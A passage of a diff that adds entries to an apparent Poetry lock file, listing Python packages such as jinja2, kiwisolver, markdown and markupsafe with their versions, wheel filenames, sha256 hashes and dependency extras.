+ {file = "importlib_resources-6.4.5-py3-none-any.whl", hash = "sha256:ac29d5f956f01d5e4bb63102a5a19957f1b9175e45649977264a1416783bb717"},
+ {file = "importlib_resources-6.4.5.tar.gz", hash = "sha256:980862a1d16c9e147a59603677fa2aa5fd82b87f223b6cb870695bcfce830065"},
+]
+
+[package.dependencies]
+zipp = {version = ">=3.1.0", markers = "python_version < \"3.10\""}
+
+[package.extras]
+check = ["pytest-checkdocs (>=2.4)", "pytest-ruff (>=0.2.1)"]
+cover = ["pytest-cov"]
+doc = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"]
+enabler = ["pytest-enabler (>=2.2)"]
+test = ["jaraco.test (>=5.4)", "pytest (>=6,!=8.1.*)", "zipp (>=3.17)"]
+type = ["pytest-mypy"]
+
+[[package]]
+name = "iniconfig"
+version = "2.0.0"
+description = "brain-dead simple config-ini parsing"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "iniconfig-2.0.0-py3-none-any.whl", hash = "sha256:b6a85871a79d2e3b22d2d1b94ac2824226a63c6b741c88f7ae975f18b6778374"},
+ {file = "iniconfig-2.0.0.tar.gz", hash = "sha256:2d91e135bf72d31a410b17c16da610a82cb55f6b0477d1a902134b24a455b8b3"},
+]
+
+[[package]]
+name = "jinja2"
+version = "3.1.5"
+description = "A very fast and expressive template engine."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "jinja2-3.1.5-py3-none-any.whl", hash = "sha256:aba0f4dc9ed8013c424088f68a5c226f7d6097ed89b246d7749c2ec4175c6adb"},
+ {file = "jinja2-3.1.5.tar.gz", hash = "sha256:8fefff8dc3034e27bb80d67c671eb8a9bc424c0ef4c0826edbff304cceff43bb"},
+]
+
+[package.dependencies]
+MarkupSafe = ">=2.0"
+
+[package.extras]
+i18n = ["Babel (>=2.7)"]
+
+[[package]]
+name = "kiwisolver"
+version = "1.4.7"
+description = "A fast implementation of the Cassowary constraint solver"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "kiwisolver-1.4.7-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8a9c83f75223d5e48b0bc9cb1bf2776cf01563e00ade8775ffe13b0b6e1af3a6"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:58370b1ffbd35407444d57057b57da5d6549d2d854fa30249771775c63b5fe17"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:aa0abdf853e09aff551db11fce173e2177d00786c688203f52c87ad7fcd91ef9"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8d53103597a252fb3ab8b5845af04c7a26d5e7ea8122303dd7a021176a87e8b9"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:88f17c5ffa8e9462fb79f62746428dd57b46eb931698e42e990ad63103f35e6c"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:88a9ca9c710d598fd75ee5de59d5bda2684d9db36a9f50b6125eaea3969c2599"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f4d742cb7af1c28303a51b7a27aaee540e71bb8e24f68c736f6f2ffc82f2bf05"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e28c7fea2196bf4c2f8d46a0415c77a1c480cc0724722f23d7410ffe9842c407"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:e968b84db54f9d42046cf154e02911e39c0435c9801681e3fc9ce8a3c4130278"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:0c18ec74c0472de033e1bebb2911c3c310eef5649133dd0bedf2a169a1b269e5"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_ppc64le.whl", hash = "sha256:8f0ea6da6d393d8b2e187e6a5e3fb81f5862010a40c3945e2c6d12ae45cfb2ad"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_s390x.whl", hash = "sha256:f106407dda69ae456dd1227966bf445b157ccc80ba0dff3802bb63f30b74e895"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:84ec80df401cfee1457063732d90022f93951944b5b58975d34ab56bb150dfb3"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-win32.whl", hash = "sha256:71bb308552200fb2c195e35ef05de12f0c878c07fc91c270eb3d6e41698c3bcc"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-win_amd64.whl", hash = "sha256:44756f9fd339de0fb6ee4f8c1696cfd19b2422e0d70b4cefc1cc7f1f64045a8c"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-win_arm64.whl", hash = "sha256:78a42513018c41c2ffd262eb676442315cbfe3c44eed82385c2ed043bc63210a"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:d2b0e12a42fb4e72d509fc994713d099cbb15ebf1103545e8a45f14da2dfca54"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2a8781ac3edc42ea4b90bc23e7d37b665d89423818e26eb6df90698aa2287c95"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:46707a10836894b559e04b0fd143e343945c97fd170d69a2d26d640b4e297935"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ef97b8df011141c9b0f6caf23b29379f87dd13183c978a30a3c546d2c47314cb"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3ab58c12a2cd0fc769089e6d38466c46d7f76aced0a1f54c77652446733d2d02"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:803b8e1459341c1bb56d1c5c010406d5edec8a0713a0945851290a7930679b51"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f9a9e8a507420fe35992ee9ecb302dab68550dedc0da9e2880dd88071c5fb052"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:18077b53dc3bb490e330669a99920c5e6a496889ae8c63b58fbc57c3d7f33a18"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:6af936f79086a89b3680a280c47ea90b4df7047b5bdf3aa5c524bbedddb9e545"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:3abc5b19d24af4b77d1598a585b8a719beb8569a71568b66f4ebe1fb0449460b"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_ppc64le.whl", hash = "sha256:933d4de052939d90afbe6e9d5273ae05fb836cc86c15b686edd4b3560cc0ee36"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_s390x.whl", hash = "sha256:65e720d2ab2b53f1f72fb5da5fb477455905ce2c88aaa671ff0a447c2c80e8e3"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:3bf1ed55088f214ba6427484c59553123fdd9b218a42bbc8c6496d6754b1e523"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-win32.whl", hash = "sha256:4c00336b9dd5ad96d0a558fd18a8b6f711b7449acce4c157e7343ba92dd0cf3d"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-win_amd64.whl", hash = "sha256:929e294c1ac1e9f615c62a4e4313ca1823ba37326c164ec720a803287c4c499b"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-win_arm64.whl", hash = "sha256:e33e8fbd440c917106b237ef1a2f1449dfbb9b6f6e1ce17c94cd6a1e0d438376"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:5360cc32706dab3931f738d3079652d20982511f7c0ac5711483e6eab08efff2"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:942216596dc64ddb25adb215c3c783215b23626f8d84e8eff8d6d45c3f29f75a"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:48b571ecd8bae15702e4f22d3ff6a0f13e54d3d00cd25216d5e7f658242065ee"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ad42ba922c67c5f219097b28fae965e10045ddf145d2928bfac2eb2e17673640"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:612a10bdae23404a72941a0fc8fa2660c6ea1217c4ce0dbcab8a8f6543ea9e7f"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9e838bba3a3bac0fe06d849d29772eb1afb9745a59710762e4ba3f4cb8424483"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:22f499f6157236c19f4bbbd472fa55b063db77a16cd74d49afe28992dff8c258"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:693902d433cf585133699972b6d7c42a8b9f8f826ebcaf0132ff55200afc599e"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:4e77f2126c3e0b0d055f44513ed349038ac180371ed9b52fe96a32aa071a5107"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:657a05857bda581c3656bfc3b20e353c232e9193eb167766ad2dc58b56504948"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:4bfa75a048c056a411f9705856abfc872558e33c055d80af6a380e3658766038"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:34ea1de54beef1c104422d210c47c7d2a4999bdecf42c7b5718fbe59a4cac383"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:90da3b5f694b85231cf93586dad5e90e2d71b9428f9aad96952c99055582f520"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-win32.whl", hash = "sha256:18e0cca3e008e17fe9b164b55735a325140a5a35faad8de92dd80265cd5eb80b"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-win_amd64.whl", hash = "sha256:58cb20602b18f86f83a5c87d3ee1c766a79c0d452f8def86d925e6c60fbf7bfb"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-win_arm64.whl", hash = "sha256:f5a8b53bdc0b3961f8b6125e198617c40aeed638b387913bf1ce78afb1b0be2a"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:2e6039dcbe79a8e0f044f1c39db1986a1b8071051efba3ee4d74f5b365f5226e"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:a1ecf0ac1c518487d9d23b1cd7139a6a65bc460cd101ab01f1be82ecf09794b6"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:7ab9ccab2b5bd5702ab0803676a580fffa2aa178c2badc5557a84cc943fcf750"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f816dd2277f8d63d79f9c8473a79fe54047bc0467754962840782c575522224d"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cf8bcc23ceb5a1b624572a1623b9f79d2c3b337c8c455405ef231933a10da379"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:dea0bf229319828467d7fca8c7c189780aa9ff679c94539eed7532ebe33ed37c"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7c06a4c7cf15ec739ce0e5971b26c93638730090add60e183530d70848ebdd34"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:913983ad2deb14e66d83c28b632fd35ba2b825031f2fa4ca29675e665dfecbe1"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:5337ec7809bcd0f424c6b705ecf97941c46279cf5ed92311782c7c9c2026f07f"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:4c26ed10c4f6fa6ddb329a5120ba3b6db349ca192ae211e882970bfc9d91420b"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_ppc64le.whl", hash = "sha256:c619b101e6de2222c1fcb0531e1b17bbffbe54294bfba43ea0d411d428618c27"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_s390x.whl", hash = "sha256:073a36c8273647592ea332e816e75ef8da5c303236ec0167196793eb1e34657a"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:3ce6b2b0231bda412463e152fc18335ba32faf4e8c23a754ad50ffa70e4091ee"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-win32.whl", hash = "sha256:f4c9aee212bc89d4e13f58be11a56cc8036cabad119259d12ace14b34476fd07"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-win_amd64.whl", hash = "sha256:8a3ec5aa8e38fc4c8af308917ce12c536f1c88452ce554027e55b22cbbfbff76"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-win_arm64.whl", hash = "sha256:76c8094ac20ec259471ac53e774623eb62e6e1f56cd8690c67ce6ce4fcb05650"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5d5abf8f8ec1f4e22882273c423e16cae834c36856cac348cfbfa68e01c40f3a"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:aeb3531b196ef6f11776c21674dba836aeea9d5bd1cf630f869e3d90b16cfade"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b7d755065e4e866a8086c9bdada157133ff466476a2ad7861828e17b6026e22c"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:08471d4d86cbaec61f86b217dd938a83d85e03785f51121e791a6e6689a3be95"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7bbfcb7165ce3d54a3dfbe731e470f65739c4c1f85bb1018ee912bae139e263b"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5d34eb8494bea691a1a450141ebb5385e4b69d38bb8403b5146ad279f4b30fa3"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9242795d174daa40105c1d86aba618e8eab7bf96ba8c3ee614da8302a9f95503"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:a0f64a48bb81af7450e641e3fe0b0394d7381e342805479178b3d335d60ca7cf"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:8e045731a5416357638d1700927529e2b8ab304811671f665b225f8bf8d8f933"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:4322872d5772cae7369f8351da1edf255a604ea7087fe295411397d0cfd9655e"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_ppc64le.whl", hash = "sha256:e1631290ee9271dffe3062d2634c3ecac02c83890ada077d225e081aca8aab89"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_s390x.whl", hash = "sha256:edcfc407e4eb17e037bca59be0e85a2031a2ac87e4fed26d3e9df88b4165f92d"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:4d05d81ecb47d11e7f8932bd8b61b720bf0b41199358f3f5e36d38e28f0532c5"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-win32.whl", hash = "sha256:b38ac83d5f04b15e515fd86f312479d950d05ce2368d5413d46c088dda7de90a"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-win_amd64.whl", hash = "sha256:d83db7cde68459fc803052a55ace60bea2bae361fc3b7a6d5da07e11954e4b09"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:3f9362ecfca44c863569d3d3c033dbe8ba452ff8eed6f6b5806382741a1334bd"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:e8df2eb9b2bac43ef8b082e06f750350fbbaf2887534a5be97f6cf07b19d9583"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f32d6edbc638cde7652bd690c3e728b25332acbadd7cad670cc4a02558d9c417"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:e2e6c39bd7b9372b0be21456caab138e8e69cc0fc1190a9dfa92bd45a1e6e904"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:dda56c24d869b1193fcc763f1284b9126550eaf84b88bbc7256e15028f19188a"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79849239c39b5e1fd906556c474d9b0439ea6792b637511f3fe3a41158d89ca8"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5e3bc157fed2a4c02ec468de4ecd12a6e22818d4f09cde2c31ee3226ffbefab2"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3da53da805b71e41053dc670f9a820d1157aae77b6b944e08024d17bcd51ef88"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:8705f17dfeb43139a692298cb6637ee2e59c0194538153e83e9ee0c75c2eddde"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:82a5c2f4b87c26bb1a0ef3d16b5c4753434633b83d365cc0ddf2770c93829e3c"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-musllinux_1_2_ppc64le.whl", hash = "sha256:ce8be0466f4c0d585cdb6c1e2ed07232221df101a4c6f28821d2aa754ca2d9e2"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-musllinux_1_2_s390x.whl", hash = "sha256:409afdfe1e2e90e6ee7fc896f3df9a7fec8e793e58bfa0d052c8a82f99c37abb"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:5b9c3f4ee0b9a439d2415012bd1b1cc2df59e4d6a9939f4d669241d30b414327"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-win32.whl", hash = "sha256:a79ae34384df2b615eefca647a2873842ac3b596418032bef9a7283675962644"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-win_amd64.whl", hash = "sha256:cf0438b42121a66a3a667de17e779330fc0f20b0d97d59d2f2121e182b0505e4"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-win_arm64.whl", hash = "sha256:764202cc7e70f767dab49e8df52c7455e8de0df5d858fa801a11aa0d882ccf3f"},
+ {file = "kiwisolver-1.4.7-pp310-pypy310_pp73-macosx_10_15_x86_64.whl", hash = "sha256:94252291e3fe68001b1dd747b4c0b3be12582839b95ad4d1b641924d68fd4643"},
+ {file = "kiwisolver-1.4.7-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:5b7dfa3b546da08a9f622bb6becdb14b3e24aaa30adba66749d38f3cc7ea9706"},
+ {file = "kiwisolver-1.4.7-pp310-pypy310_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bd3de6481f4ed8b734da5df134cd5a6a64fe32124fe83dde1e5b5f29fe30b1e6"},
+ {file = "kiwisolver-1.4.7-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a91b5f9f1205845d488c928e8570dcb62b893372f63b8b6e98b863ebd2368ff2"},
+ {file = "kiwisolver-1.4.7-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:40fa14dbd66b8b8f470d5fc79c089a66185619d31645f9b0773b88b19f7223c4"},
+ {file = "kiwisolver-1.4.7-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:eb542fe7933aa09d8d8f9d9097ef37532a7df6497819d16efe4359890a2f417a"},
+ {file = "kiwisolver-1.4.7-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:bfa1acfa0c54932d5607e19a2c24646fb4c1ae2694437789129cf099789a3b00"},
+ {file = "kiwisolver-1.4.7-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:eee3ea935c3d227d49b4eb85660ff631556841f6e567f0f7bda972df6c2c9935"},
+ {file = "kiwisolver-1.4.7-pp38-pypy38_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:f3160309af4396e0ed04db259c3ccbfdc3621b5559b5453075e5de555e1f3a1b"},
+ {file = "kiwisolver-1.4.7-pp38-pypy38_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:a17f6a29cf8935e587cc8a4dbfc8368c55edc645283db0ce9801016f83526c2d"},
+ {file = "kiwisolver-1.4.7-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:10849fb2c1ecbfae45a693c070e0320a91b35dd4bcf58172c023b994283a124d"},
+ {file = "kiwisolver-1.4.7-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:ac542bf38a8a4be2dc6b15248d36315ccc65f0743f7b1a76688ffb6b5129a5c2"},
+ {file = "kiwisolver-1.4.7-pp39-pypy39_pp73-macosx_10_15_x86_64.whl", hash = "sha256:8b01aac285f91ca889c800042c35ad3b239e704b150cfd3382adfc9dcc780e39"},
+ {file = "kiwisolver-1.4.7-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:48be928f59a1f5c8207154f935334d374e79f2b5d212826307d072595ad76a2e"},
+ {file = "kiwisolver-1.4.7-pp39-pypy39_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f37cfe618a117e50d8c240555331160d73d0411422b59b5ee217843d7b693608"},
+ {file = "kiwisolver-1.4.7-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:599b5c873c63a1f6ed7eead644a8a380cfbdf5db91dcb6f85707aaab213b1674"},
+ {file = "kiwisolver-1.4.7-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:801fa7802e5cfabe3ab0c81a34c323a319b097dfb5004be950482d882f3d7225"},
+ {file = "kiwisolver-1.4.7-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:0c6c43471bc764fad4bc99c5c2d6d16a676b1abf844ca7c8702bdae92df01ee0"},
+ {file = "kiwisolver-1.4.7.tar.gz", hash = "sha256:9893ff81bd7107f7b685d3017cc6583daadb4fc26e4a888350df530e41980a60"},
+]
+
+[[package]]
+name = "markdown"
+version = "3.7"
+description = "Python implementation of John Gruber's Markdown."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "Markdown-3.7-py3-none-any.whl", hash = "sha256:7eb6df5690b81a1d7942992c97fad2938e956e79df20cbc6186e9c3a77b1c803"},
+ {file = "markdown-3.7.tar.gz", hash = "sha256:2ae2471477cfd02dbbf038d5d9bc226d40def84b4fe2986e49b59b6b472bbed2"},
+]
+
+[package.dependencies]
+importlib-metadata = {version = ">=4.4", markers = "python_version < \"3.10\""}
+
+[package.extras]
+docs = ["mdx-gh-links (>=0.2)", "mkdocs (>=1.5)", "mkdocs-gen-files", "mkdocs-literate-nav", "mkdocs-nature (>=0.6)", "mkdocs-section-index", "mkdocstrings[python]"]
+testing = ["coverage", "pyyaml"]
+
+[[package]]
+name = "markdown-include"
+version = "0.6.0"
+description = "This is an extension to Python-Markdown which provides an \"include\" function, similar to that found in LaTeX (and also the C pre-processor and Fortran). I originally wrote it for my FORD Fortran auto-documentation generator."
+optional = false
+python-versions = "*"
+files = [
+ {file = "markdown-include-0.6.0.tar.gz", hash = "sha256:6f5d680e36f7780c7f0f61dca53ca581bd50d1b56137ddcd6353efafa0c3e4a2"},
+]
+
+[package.dependencies]
+markdown = "*"
+
+[[package]]
+name = "markupsafe"
+version = "2.1.5"
+description = "Safely add untrusted strings to HTML/XML markup."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "MarkupSafe-2.1.5-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:a17a92de5231666cfbe003f0e4b9b3a7ae3afb1ec2845aadc2bacc93ff85febc"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:72b6be590cc35924b02c78ef34b467da4ba07e4e0f0454a2c5907f473fc50ce5"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e61659ba32cf2cf1481e575d0462554625196a1f2fc06a1c777d3f48e8865d46"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2174c595a0d73a3080ca3257b40096db99799265e1c27cc5a610743acd86d62f"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ae2ad8ae6ebee9d2d94b17fb62763125f3f374c25618198f40cbb8b525411900"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:075202fa5b72c86ad32dc7d0b56024ebdbcf2048c0ba09f1cde31bfdd57bcfff"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:598e3276b64aff0e7b3451b72e94fa3c238d452e7ddcd893c3ab324717456bad"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:fce659a462a1be54d2ffcacea5e3ba2d74daa74f30f5f143fe0c58636e355fdd"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-win32.whl", hash = "sha256:d9fad5155d72433c921b782e58892377c44bd6252b5af2f67f16b194987338a4"},
+ {file = "MarkupSafe-2.1.5-cp310-cp310-win_amd64.whl", hash = "sha256:bf50cd79a75d181c9181df03572cdce0fbb75cc353bc350712073108cba98de5"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:629ddd2ca402ae6dbedfceeba9c46d5f7b2a61d9749597d4307f943ef198fc1f"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:5b7b716f97b52c5a14bffdf688f971b2d5ef4029127f1ad7a513973cfd818df2"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6ec585f69cec0aa07d945b20805be741395e28ac1627333b1c5b0105962ffced"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b91c037585eba9095565a3556f611e3cbfaa42ca1e865f7b8015fe5c7336d5a5"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7502934a33b54030eaf1194c21c692a534196063db72176b0c4028e140f8f32c"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0e397ac966fdf721b2c528cf028494e86172b4feba51d65f81ffd65c63798f3f"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:c061bb86a71b42465156a3ee7bd58c8c2ceacdbeb95d05a99893e08b8467359a"},
